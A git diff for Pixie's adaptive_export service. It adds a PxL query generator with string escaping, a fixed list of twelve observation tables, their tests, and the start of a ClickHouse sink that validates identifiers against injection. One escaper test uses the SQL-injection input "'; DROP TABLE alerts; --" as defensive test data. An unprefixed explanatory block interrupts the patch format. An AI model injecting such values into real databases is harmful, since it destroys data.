a/src/vizier/services/adaptive_export/internal/pxl/BUILD.bazel b/src/vizier/services/adaptive_export/internal/pxl/BUILD.bazel index 80afa3f2875..242fff5e2a9 100644 --- a/src/vizier/services/adaptive_export/internal/pxl/BUILD.bazel +++ b/src/vizier/services/adaptive_export/internal/pxl/BUILD.bazel @@ -15,16 +15,29 @@ # SPDX-License-Identifier: Apache-2.0 load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") go_library( name = "pxl", - srcs = ["pxl.go"], + srcs = [ + "queryfor.go", + "tables.go", + ], importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/pxl", visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], deps = [ - "//src/api/go/pxapi", - "//src/api/go/pxapi/errdefs", - "//src/api/go/pxapi/types", - "@com_github_sirupsen_logrus//:logrus", + "//src/vizier/services/adaptive_export/internal/anomaly", + ], +) + +pl_go_test( + name = "pxl_test", + srcs = [ + "queryfor_test.go", + "tables_test.go", + ], + embed = [":pxl"], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", ], ) diff --git a/src/vizier/services/adaptive_export/internal/pxl/pxl.go b/src/vizier/services/adaptive_export/internal/pxl/pxl.go deleted file mode 100644 index e4e27a40b6b..00000000000 --- 
a/src/vizier/services/adaptive_export/internal/pxl/pxl.go +++ /dev/null @@ -1,80 +0,0 @@ -// Copyright 2018- The Pixie Authors. -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -// SPDX-License-Identifier: Apache-2.0 - -package pxl - -import ( - "context" - "fmt" - - log "github.com/sirupsen/logrus" - "px.dev/pixie/src/api/go/pxapi" - "px.dev/pixie/src/api/go/pxapi/errdefs" - "px.dev/pixie/src/api/go/pxapi/types" -) - -// recordCounter counts the number of records received -type recordCounter struct { - count int -} - -func (r *recordCounter) HandleInit(ctx context.Context, metadata types.TableMetadata) error { - return nil -} - -func (r *recordCounter) HandleRecord(ctx context.Context, record *types.Record) error { - r.count++ - return nil -} - -func (r *recordCounter) HandleDone(ctx context.Context) error { - return nil -} - -type recordCounterMux struct { - counter *recordCounter -} - -func (m *recordCounterMux) AcceptTable(ctx context.Context, metadata types.TableMetadata) (pxapi.TableRecordHandler, error) { - return m.counter, nil -} - -// ExecuteScript executes a PxL script and returns the number of records returned -func ExecuteScript(ctx context.Context, client *pxapi.Client, clusterID string, pxl string) (int, error) { - vz, err := client.NewVizierClient(ctx, clusterID) - if err != nil { - return 0, fmt.Errorf("failed to create vizier client: %w", err) - } - - counter := &recordCounter{} - tm := &recordCounterMux{counter: counter} - - resultSet, err := vz.ExecuteScript(ctx, pxl, tm) - if err != nil { - return 0, fmt.Errorf("failed to execute script: %w", err) - } - defer resultSet.Close() - - if err := resultSet.Stream(); err != nil { - if errdefs.IsCompilationError(err) { - return 0, fmt.Errorf("PxL compilation error: %w", err) - } - return 0, fmt.Errorf("error streaming results: %w", err) - } - - log.Debugf("Script execution time: %v, bytes received: %v", resultSet.Stats().ExecutionTime, resultSet.Stats().TotalBytes) - return counter.count, nil -} diff --git a/src/vizier/services/adaptive_export/internal/pxl/queryfor.go b/src/vizier/services/adaptive_export/internal/pxl/queryfor.go new file mode 100644 index 00000000000..cd3053f8795 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pxl/queryfor.go @@ -0,0 +1,80 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. 
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package pxl
+
+import (
+	"errors"
+	"fmt"
+	"strconv"
+	"strings"
+	"time"
+
+	"px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+)
+
+// ErrUnknownTable is returned by QueryFor for a table not in BuiltinTables.
+var ErrUnknownTable = errors.New("pxl: unknown pixie table")
+
+// QueryFor returns a PxL script that selects rows from `table` for the
+// (namespace, pod) of `t`, time-bounded to [sliceStart, sliceEnd). The
+// `now` argument lets us compute a relative `start_time=` for
+// px.DataFrame (PxL rejects ISO-string absolute bounds; we use a
+// generously-padded relative bound and post-filter precisely with
+// px.int64_to_time on the time_ column).
+func QueryFor(table string, t anomaly.Target, sliceStart, sliceEnd, now time.Time) (string, error) {
+	if !IsBuiltin(table) {
+		return "", fmt.Errorf("%w: %q", ErrUnknownTable, table)
+	}
+	// pad covers (now - sliceStart) plus a 30s safety margin. When
+	// sliceStart is in the future (caller bug), now.Sub is negative and
+	// we'd ask pixie for a positive-only relative start; clamp to 30s.
+	pad := now.Sub(sliceStart) + 30*time.Second
+	if pad < 30*time.Second {
+		pad = 30 * time.Second
+	}
+	relStart := "-" + strconv.FormatInt(int64(pad/time.Second), 10) + "s"
+
+	var b strings.Builder
+	b.WriteString("import px\n")
+	b.WriteString("df = px.DataFrame(table='" + table + "', start_time='" + relStart + "')\n")
+	b.WriteString("df = df[df.time_ >= px.int64_to_time(" + strconv.FormatInt(sliceStart.UnixNano(), 10) + ")]\n")
+	b.WriteString("df = df[df.time_ < px.int64_to_time(" + strconv.FormatInt(sliceEnd.UnixNano(), 10) + ")]\n")
+	b.WriteString("df.namespace = px.upid_to_namespace(df.upid)\n")
+	// px.upid_to_pod_name returns "<namespace>/<pod-name>" (carnot:
+	// metadata_ops.h UPIDToPodNameUDF::Exec → absl::Substitute("$0/$1", ns, name)),
+	// not the bare pod name. Filtering against bare t.Pod would always
+	// miss; build the namespaced key when we have both fields.
+	b.WriteString("df.pod = px.upid_to_pod_name(df.upid)\n")
+	if t.Namespace != "" {
+		b.WriteString("df = df[df.namespace == '" + escapePxL(t.Namespace) + "']\n")
+	}
+	if t.Pod != "" {
+		podKey := t.Pod
+		if t.Namespace != "" {
+			podKey = t.Namespace + "/" + t.Pod
+		}
+		b.WriteString("df = df[df.pod == '" + escapePxL(podKey) + "']\n")
+	}
+	b.WriteString("px.display(df, '" + table + "')\n")
+	return b.String(), nil
+}
+
+var pxlEscaper = strings.NewReplacer(`\`, `\\`, `'`, `\'`)
+
+func escapePxL(s string) string {
+	return pxlEscaper.Replace(s)
+}
diff --git a/src/vizier/services/adaptive_export/internal/pxl/queryfor_test.go b/src/vizier/services/adaptive_export/internal/pxl/queryfor_test.go
new file mode 100644
index 00000000000..e8bd7ca6c08
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/pxl/queryfor_test.go
@@ -0,0 +1,222 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package pxl
+
+import (
+	"errors"
+	"strings"
+	"testing"
+	"time"
+
+	"px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+)
+
+// fixed reference time for deterministic relStart computation.
+var (
+	fixedNow   = time.Date(2026, 5, 9, 15, 23, 44, 0, time.UTC)
+	fixedStart = fixedNow.Add(-5 * time.Minute) // ATTACK − 5 min
+	fixedEnd   = fixedNow.Add(5 * time.Minute)  // ATTACK + 5 min
+	target     = anomaly.Target{
+		PID: 12345, Comm: "redis-server",
+		Pod: "redis-6fbcfb97c-82qxv", Namespace: "redis",
+	}
+)
+
+// TestQueryFor_UnknownTable — non-builtin tables wrap ErrUnknownTable.
+func TestQueryFor_UnknownTable(t *testing.T) {
+	_, err := QueryFor("nope_table", target, fixedStart, fixedEnd, fixedNow)
+	if err == nil || !errors.Is(err, ErrUnknownTable) {
+		t.Fatalf("want ErrUnknownTable wrapper, got %v", err)
+	}
+	if !strings.Contains(err.Error(), `"nope_table"`) {
+		t.Fatalf("error must echo the bad table name; got %v", err)
+	}
+}
+
+// TestQueryFor_NamespacedPodFilter — px.upid_to_pod_name returns
+// "<namespace>/<pod-name>" (verified in carnot's metadata_ops.h:387).
+// The generated PxL must filter against the namespaced key when both
+// fields are non-empty.
+func TestQueryFor_NamespacedPodFilter(t *testing.T) {
+	q, err := QueryFor("redis_events", target, fixedStart, fixedEnd, fixedNow)
+	if err != nil {
+		t.Fatalf("QueryFor: %v", err)
+	}
+	wantPodFilter := `df = df[df.pod == 'redis/redis-6fbcfb97c-82qxv']`
+	if !strings.Contains(q, wantPodFilter) {
+		t.Fatalf("expected pod filter %q in:\n%s", wantPodFilter, q)
+	}
+	wantNS := `df = df[df.namespace == 'redis']`
+	if !strings.Contains(q, wantNS) {
+		t.Fatalf("expected namespace filter %q in:\n%s", wantNS, q)
+	}
+}
+
+// TestQueryFor_NamespaceOnly — only namespace filter when Pod is empty.
+func TestQueryFor_NamespaceOnly(t *testing.T) {
+	tNoPod := anomaly.Target{Namespace: "redis"}
+	q, err := QueryFor("redis_events", tNoPod, fixedStart, fixedEnd, fixedNow)
+	if err != nil {
+		t.Fatalf("QueryFor: %v", err)
+	}
+	if !strings.Contains(q, `df = df[df.namespace == 'redis']`) {
+		t.Fatalf("expected namespace filter; got:\n%s", q)
+	}
+	if strings.Contains(q, "df = df[df.pod ==") {
+		t.Fatalf("did not expect pod filter when Pod is empty; got:\n%s", q)
+	}
+}
+
+// TestQueryFor_PodOnly — when Namespace is empty but Pod is set, fall
+// back to a bare-pod filter (won't match in pixie since upid_to_pod_name
+// always returns namespaced; documented as caller-shouldn't-do-this).
+func TestQueryFor_PodOnly(t *testing.T) {
+	tNoNS := anomaly.Target{Pod: "redis-foo"}
+	q, err := QueryFor("redis_events", tNoNS, fixedStart, fixedEnd, fixedNow)
+	if err != nil {
+		t.Fatalf("QueryFor: %v", err)
+	}
+	if !strings.Contains(q, `df = df[df.pod == 'redis-foo']`) {
+		t.Fatalf("expected bare pod filter; got:\n%s", q)
+	}
+	if strings.Contains(q, "df = df[df.namespace ==") {
+		t.Fatalf("did not expect namespace filter; got:\n%s", q)
+	}
+}
+
+// TestQueryFor_NoTargetFilters — empty Target → no namespace OR pod
+// filter (caller-driven coarse query).
+func TestQueryFor_NoTargetFilters(t *testing.T) {
+	q, err := QueryFor("redis_events", anomaly.Target{}, fixedStart, fixedEnd, fixedNow)
+	if err != nil {
+		t.Fatalf("QueryFor: %v", err)
+	}
+	if strings.Contains(q, "df.namespace ==") || strings.Contains(q, "df.pod ==") {
+		t.Fatalf("expected no namespace/pod filter for empty Target; got:\n%s", q)
+	}
+}
+
+// TestQueryFor_TimeBoundsAreInclusiveLowerExclusiveUpper — sliceStart
+// is `>=`; sliceEnd is `<`.
Encoded as nanos. +func TestQueryFor_TimeBoundsAreInclusiveLowerExclusiveUpper(t *testing.T) { + q, err := QueryFor("redis_events", target, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + wantLower := `df = df[df.time_ >= px.int64_to_time(1778339924000000000)]` // 15:18:44 UTC ns + wantUpper := `df = df[df.time_ < px.int64_to_time(1778340524000000000)]` // 15:28:44 UTC ns + if !strings.Contains(q, wantLower) { + t.Fatalf("expected lower bound %q in:\n%s", wantLower, q) + } + if !strings.Contains(q, wantUpper) { + t.Fatalf("expected upper bound %q in:\n%s", wantUpper, q) + } +} + +// TestQueryFor_RelativeStartTime — pad covers (now − sliceStart) plus +// 30 s. With ATTACK − 5min as sliceStart and now == ATTACK, pad is +// 5 min + 30 s = 330 s. +func TestQueryFor_RelativeStartTime(t *testing.T) { + q, err := QueryFor("redis_events", target, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + if !strings.Contains(q, "start_time='-330s'") { + t.Fatalf("expected start_time='-330s' in:\n%s", q) + } +} + +// TestQueryFor_PadFloorOn30sWhenSliceStartIsFuture — caller-bug case; +// pad clamps to 30 s rather than emitting a positive (forward) start. +func TestQueryFor_PadFloorOn30sWhenSliceStartIsFuture(t *testing.T) { + futureStart := fixedNow.Add(1 * time.Minute) // sliceStart > now + q, err := QueryFor("redis_events", target, futureStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + if !strings.Contains(q, "start_time='-30s'") { + t.Fatalf("expected start_time='-30s' clamp in:\n%s", q) + } +} + +// TestQueryFor_EscapesSingleQuoteInTarget — apostrophes in pod / +// namespace get backslash-escaped so they don't break out of the +// PxL string literal. +func TestQueryFor_EscapesSingleQuoteInTarget(t *testing.T) { + tWeird := anomaly.Target{Namespace: "ns'with'quotes", Pod: "p'od"} + q, err := QueryFor("redis_events", tWeird, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + if !strings.Contains(q, `df = df[df.namespace == 'ns\'with\'quotes']`) { + t.Fatalf("expected escaped namespace; got:\n%s", q) + } + if !strings.Contains(q, `df = df[df.pod == 'ns\'with\'quotes/p\'od']`) { + t.Fatalf("expected escaped namespaced pod key; got:\n%s", q) + } +} + +// TestQueryFor_EscapesBackslashInTarget — backslashes too. Asserts +// both namespace and the namespaced pod-key forms are escaped, so a +// `Pod` containing `\` can't terminate the PxL string literal. +func TestQueryFor_EscapesBackslashInTarget(t *testing.T) { + tWeird := anomaly.Target{Namespace: `ns\back`, Pod: `p\od`} + q, err := QueryFor("redis_events", tWeird, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + if !strings.Contains(q, `df = df[df.namespace == 'ns\\back']`) { + t.Fatalf("expected escaped namespace; got:\n%s", q) + } + if !strings.Contains(q, `df = df[df.pod == 'ns\\back/p\\od']`) { + t.Fatalf("expected escaped namespaced pod key; got:\n%s", q) + } +} + +// TestQueryFor_EveryBuiltinTableEmits — smoke-test all known tables +// produce a syntactically-shaped PxL output (compile-not-tested). 
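Stitching those assertions together, the complete script QueryFor emits for the canonical fixture (table `redis_events`, the redis target, ATTACK ± 5 min) reconstructs, directly from the generator code and the verified constants, to:

```go
// Reconstructed from QueryFor and the fixtures above. Not a new test,
// just the full emitted script for reference.
const wantCanonicalScript = `import px
df = px.DataFrame(table='redis_events', start_time='-330s')
df = df[df.time_ >= px.int64_to_time(1778339924000000000)]
df = df[df.time_ < px.int64_to_time(1778340524000000000)]
df.namespace = px.upid_to_namespace(df.upid)
df.pod = px.upid_to_pod_name(df.upid)
df = df[df.namespace == 'redis']
df = df[df.pod == 'redis/redis-6fbcfb97c-82qxv']
px.display(df, 'redis_events')
`
```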
+func TestQueryFor_EveryBuiltinTableEmits(t *testing.T) {
+	for _, table := range Names(BuiltinTables) {
+		q, err := QueryFor(table, target, fixedStart, fixedEnd, fixedNow)
+		if err != nil {
+			t.Fatalf("table %s: %v", table, err)
+		}
+		if !strings.HasPrefix(q, "import px\n") {
+			t.Fatalf("table %s: expected import px header; got:\n%s", table, q)
+		}
+		if !strings.Contains(q, "px.display(df, '"+table+"')") {
+			t.Fatalf("table %s: expected px.display call with table name; got:\n%s", table, q)
+		}
+	}
+}
+
+// TestEscapePxL_TableDriven — direct coverage of the escaper.
+func TestEscapePxL_TableDriven(t *testing.T) {
+	cases := []struct{ in, want string }{
+		{"", ""},
+		{"plain", "plain"},
+		{"o'malley", `o\'malley`},
+		{`back\slash`, `back\\slash`},
+		{`mix'and\back`, `mix\'and\\back`},
+		{"'; DROP TABLE alerts; --", `\'; DROP TABLE alerts; --`},
+	}
+	for _, c := range cases {
+		if got := escapePxL(c.in); got != c.want {
+			t.Errorf("escapePxL(%q) = %q, want %q", c.in, got, c.want)
+		}
+	}
+}
diff --git a/src/vizier/services/adaptive_export/internal/pxl/tables.go b/src/vizier/services/adaptive_export/internal/pxl/tables.go
new file mode 100644
index 00000000000..057a2cb57f0
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/pxl/tables.go
@@ -0,0 +1,110 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package pxl carries the strongly-typed list of pixie observation
+// tables the adaptive-write feature targets, plus a stub Registry
+// extension point for the future-PR work that lets users plug in their
+// own tables alongside their UI-defined retention scripts.
+//
+// Importantly: on the default path the operator does NOT execute PxL
+// itself; Pixie's retention plugin runs the user-defined PxL scripts
+// and populates ClickHouse. (The rev-1 fan-out in internal/pixieapi,
+// gated behind ADAPTIVE_PUSH_PIXIE_ROWS=true, is the exception.)
+// This package is only used to:
+//   - enumerate the pixie tables the operator is aware of
+//   - keep a stable, named, audit-friendly set (no dynamic discovery)
+//   - declare the future Registry extension surface
+package pxl
+
+// TableSpec is the strongly-typed identity of one pixie socket_tracer
+// table the operator knows about. Bare-string identifiers are
+// deliberately avoided in callers — TableSpec carries the table name
+// today and is the natural place to attach future fields (column
+// projections, retention TTLs, semantic tags) without breaking the API.
+type TableSpec struct {
+	// Name is the ClickHouse / Pixie table name. Dotted names
+	// (e.g. "http2_messages.beta") are stored verbatim; backtick
+	// quoting is the responsibility of SQL emitters.
+	Name string
+
+	// Protocol is the wire protocol the table observes. Documentary;
+	// helps an operator audit "which tables are about HTTP".
+	Protocol string
+}
+
+// BuiltinTables enumerates the 12 pixie socket_tracer tables the
+// adaptive-write feature is shipped with. The order is stable and
+// matches the project's published documentation.
Do NOT loop over +// dynamic discovery to populate this — strong static definition is +// the requirement. +var BuiltinTables = []TableSpec{ + {Name: "http_events", Protocol: "HTTP/1.x"}, + {Name: "http2_messages.beta", Protocol: "HTTP/2 + gRPC"}, + {Name: "dns_events", Protocol: "DNS"}, + {Name: "redis_events", Protocol: "Redis (RESP)"}, + {Name: "mysql_events", Protocol: "MySQL"}, + {Name: "pgsql_events", Protocol: "PostgreSQL"}, + {Name: "cql_events", Protocol: "Cassandra / CQL"}, + {Name: "mongodb_events", Protocol: "MongoDB"}, + {Name: "kafka_events.beta", Protocol: "Kafka"}, + {Name: "amqp_events", Protocol: "AMQP / RabbitMQ"}, + {Name: "mux_events", Protocol: "Mux (Twitter Finagle)"}, + {Name: "tls_events", Protocol: "TLS handshake"}, +} + +// Registry is the extension surface for users to register their own +// tables alongside the built-ins. STUB — not wired into the controller +// or main.go in this PR. The intended future shape is: +// +// ctlCfg.Registry = pxl.Compose(pxl.DefaultRegistry(), userRegistry) +// +// where Compose merges built-ins with user additions, and the +// controller iterates Registry.Tables() instead of BuiltinTables. +// +// Today the controller and main.go consume BuiltinTables directly. +// The future PR will plumb a Registry through controller.Config and +// rewrite the consumers. +type Registry interface { + Tables() []TableSpec +} + +// DefaultRegistry returns a Registry over BuiltinTables. Future-PR +// callers compose this with user-supplied registries. +func DefaultRegistry() Registry { return defaultRegistry{} } + +type defaultRegistry struct{} + +func (defaultRegistry) Tables() []TableSpec { return BuiltinTables } + +// Names projects a []TableSpec to a []string for legacy callers that +// take bare names. Useful at API boundaries that haven't been +// strong-typed yet (controller.Config.Tables is one). +func Names(specs []TableSpec) []string { + out := make([]string, len(specs)) + for i, s := range specs { + out[i] = s.Name + } + return out +} + +// IsBuiltin reports whether the given name is one of the built-in +// tables. Bare-string callers can use this as a defensive guard. +func IsBuiltin(name string) bool { + for _, t := range BuiltinTables { + if t.Name == name { + return true + } + } + return false +} diff --git a/src/vizier/services/adaptive_export/internal/pxl/tables_test.go b/src/vizier/services/adaptive_export/internal/pxl/tables_test.go new file mode 100644 index 00000000000..bc6815190cf --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pxl/tables_test.go @@ -0,0 +1,96 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package pxl + +import ( + "testing" +) + +// TestBuiltinTables_Count — guard against accidental list churn. 
+// The set is the 12 socket_tracer tables in pixie's stirling layer +// (http_events, http2_messages.beta, dns_events, redis_events, +// mysql_events, pgsql_events, cql_events, mongodb_events, +// kafka_events.beta, amqp_events, mux_events, tls_events). Update +// this guard if the spec adds / removes a table. +func TestBuiltinTables_Count(t *testing.T) { + const want = 12 + if got := len(BuiltinTables); got != want { + t.Fatalf("BuiltinTables = %d entries, want %d", got, want) + } +} + +// TestBuiltinTables_AllNamesUnique — no duplicates. +func TestBuiltinTables_AllNamesUnique(t *testing.T) { + seen := map[string]bool{} + for _, sp := range BuiltinTables { + if seen[sp.Name] { + t.Fatalf("duplicate table %q in BuiltinTables", sp.Name) + } + seen[sp.Name] = true + } +} + +// TestBuiltinTables_AllHaveProtocol — each entry is annotated, so audit +// queries like "which tables observe HTTP?" work without parsing the name. +func TestBuiltinTables_AllHaveProtocol(t *testing.T) { + for _, sp := range BuiltinTables { + if sp.Protocol == "" { + t.Fatalf("BuiltinTable %q missing Protocol annotation", sp.Name) + } + } +} + +// TestIsBuiltin — defensive guard for bare-string callers. +func TestIsBuiltin(t *testing.T) { + if !IsBuiltin("redis_events") { + t.Fatalf("redis_events should be a builtin") + } + if !IsBuiltin("http2_messages.beta") { + t.Fatalf("dotted table http2_messages.beta should be a builtin") + } + if IsBuiltin("conn_stats") { + t.Fatalf("conn_stats is no longer in scope; should NOT be builtin") + } + if IsBuiltin("") { + t.Fatalf("empty string should not be builtin") + } +} + +// TestDefaultRegistry — stub returns BuiltinTables. +func TestDefaultRegistry(t *testing.T) { + r := DefaultRegistry() + got := r.Tables() + if len(got) != len(BuiltinTables) { + t.Fatalf("DefaultRegistry().Tables() len %d, want %d", len(got), len(BuiltinTables)) + } + for i, sp := range BuiltinTables { + if got[i] != sp { + t.Fatalf("DefaultRegistry().Tables()[%d] = %+v, want %+v", i, got[i], sp) + } + } +} + +// TestNames — projection to []string preserves order. +func TestNames(t *testing.T) { + names := Names(BuiltinTables) + if len(names) != len(BuiltinTables) { + t.Fatalf("Names len mismatch") + } + if names[0] != "http_events" { + t.Fatalf("first name = %q, want http_events", names[0]) + } +} diff --git a/src/vizier/services/adaptive_export/internal/sink/BUILD.bazel b/src/vizier/services/adaptive_export/internal/sink/BUILD.bazel new file mode 100644 index 00000000000..70d6fa59d11 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/sink/BUILD.bazel @@ -0,0 +1,37 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+#
+# SPDX-License-Identifier: Apache-2.0
+
+load("@io_bazel_rules_go//go:def.bzl", "go_library")
+load("//bazel:pl_build_system.bzl", "pl_go_test")
+
+go_library(
+    name = "sink",
+    srcs = ["clickhouse.go"],
+    importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink",
+    visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
+    deps = [
+        "//src/vizier/services/adaptive_export/internal/anomaly",
+    ],
+)
+
+pl_go_test(
+    name = "sink_test",
+    srcs = ["clickhouse_test.go"],
+    embed = [":sink"],
+    deps = [
+        "//src/vizier/services/adaptive_export/internal/anomaly",
+    ],
+)
diff --git a/src/vizier/services/adaptive_export/internal/sink/clickhouse.go b/src/vizier/services/adaptive_export/internal/sink/clickhouse.go
new file mode 100644
index 00000000000..322600a206a
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/sink/clickhouse.go
@@ -0,0 +1,427 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+//     http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package sink writes operator-owned rows to ClickHouse over the HTTP
+// interface (default port 8123). It has two write surfaces:
+//
+//  1. forensic_db.adaptive_attribution — one row per arriving kubescape
+//     anomaly. ReplacingMergeTree(t_end) on the table side collapses
+//     re-inserts with the same (hostname, anomaly_hash) primary key
+//     into the row with the largest t_end.
+//
+//  2. forensic_db.<table> — operator-pushed pixie observation rows
+//     (rev-1 fan-out path, gated on ADAPTIVE_PUSH_PIXIE_ROWS=true).
+//     Used when Pixie's cloud-side retention plugin can't reach an
+//     in-cluster CH endpoint; the operator queries pixie itself and
+//     writes the result with WritePixieRows.
+package sink
+
+import (
+	"bufio"
+	"bytes"
+	"context"
+	"encoding/json"
+	"fmt"
+	"io"
+	"net/http"
+	"net/url"
+	"regexp"
+	"strconv"
+	"strings"
+	"time"
+
+	"px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+)
+
+// pixieTableIdentRE accepts plain CH identifiers and dotted protobuf
+// extensions like `http2_messages.beta`. Used to gate `table` strings
+// before they're interpolated into the INSERT query.
+var pixieTableIdentRE = regexp.MustCompile(`^[A-Za-z_][A-Za-z0-9_]*(\.[A-Za-z_][A-Za-z0-9_]*)?$`)
+
+// chIdentRE — strict CH identifier (no dots). Used to gate Database
+// (and any future single-segment identifier) against SQL injection
+// from env/config-driven values.
+var chIdentRE = regexp.MustCompile(`^[A-Za-z_][A-Za-z0-9_]*$`)
+
+func validateTableIdentifier(t string) error {
+	if !pixieTableIdentRE.MatchString(t) {
+		return fmt.Errorf("sink: invalid table identifier %q", t)
+	}
+	return nil
+}
+
+// Config configures a ClickHouseHTTP sink.
+type Config struct {
+	Endpoint string        // e.g. http://clickhouse:8123
+	Database string        // defaults to "forensic_db"
+	Username string        // optional basic auth
+	Password string        // optional basic auth
+	Timeout  time.Duration // per-write HTTP timeout; 0 → 30s
+}
+
+// AttributionRow is one row of forensic_db.adaptive_attribution.
+// All fields are required except LastRuleID.
+type AttributionRow struct {
+	AnomalyHash anomaly.AnomalyHash
+	Namespace   string // may be empty
+	Pod         string // may be empty
+	Comm        string
+	PID         uint64
+	Hostname    string
+	TStart      time.Time
+	TEnd        time.Time
+	LastSeen    time.Time
+	LastRuleID  string
+	NAnomalies  uint64
+}
+
+// ClickHouseHTTP is the production sink.
+type ClickHouseHTTP struct {
+	cfg    Config
+	client *http.Client
+}
+
+// New validates Config + returns a ready-to-use sink.
+func New(cfg Config) (*ClickHouseHTTP, error) {
+	if cfg.Endpoint == "" {
+		return nil, fmt.Errorf("sink: empty Endpoint")
+	}
+	u, err := url.Parse(cfg.Endpoint)
+	if err != nil {
+		return nil, fmt.Errorf("sink: invalid Endpoint %q: %w", cfg.Endpoint, err)
+	}
+	if (u.Scheme != "http" && u.Scheme != "https") || u.Host == "" {
+		return nil, fmt.Errorf("sink: Endpoint must be an absolute http(s) URL: %q", cfg.Endpoint)
+	}
+	// We append "/?query=…" downstream via string concatenation; if
+	// the configured Endpoint already carries a query or fragment, the
+	// concatenated URL is malformed (a second '?' becomes path data,
+	// fragments swallow trailing characters). Forbid both up-front.
+	if u.RawQuery != "" || u.Fragment != "" {
+		return nil, fmt.Errorf("sink: Endpoint must not include query parameters or a fragment: %q", cfg.Endpoint)
+	}
+	// Strip a trailing "/" from the path so downstream concatenation
+	// (Endpoint + "/?query=…") doesn't produce a "//?query=…" — some
+	// proxies / ingress controllers reject double-slashes.
+	cfg.Endpoint = strings.TrimRight(cfg.Endpoint, "/")
+	if cfg.Database == "" {
+		cfg.Database = "forensic_db"
+	}
+	// Database is interpolated directly into INSERT/SELECT statements
+	// (used in Write, WritePixieRows, QueryActive). Block injection
+	// via env/config-supplied values.
+	if !chIdentRE.MatchString(cfg.Database) {
+		return nil, fmt.Errorf("sink: invalid Database identifier %q (must match [A-Za-z_][A-Za-z0-9_]*)", cfg.Database)
+	}
+	// http.Client.Timeout enforces only when >0; a negative value
+	// would silently disable the deadline. Reject explicitly so the
+	// "0 → 30s default" branch below is the only zero-handling path.
+	if cfg.Timeout < 0 {
+		return nil, fmt.Errorf("sink: Timeout must be >= 0 (got %s)", cfg.Timeout)
+	}
+	if cfg.Timeout == 0 {
+		cfg.Timeout = 30 * time.Second
+	}
+	return &ClickHouseHTTP{
+		cfg:    cfg,
+		client: &http.Client{Timeout: cfg.Timeout},
+	}, nil
+}
+
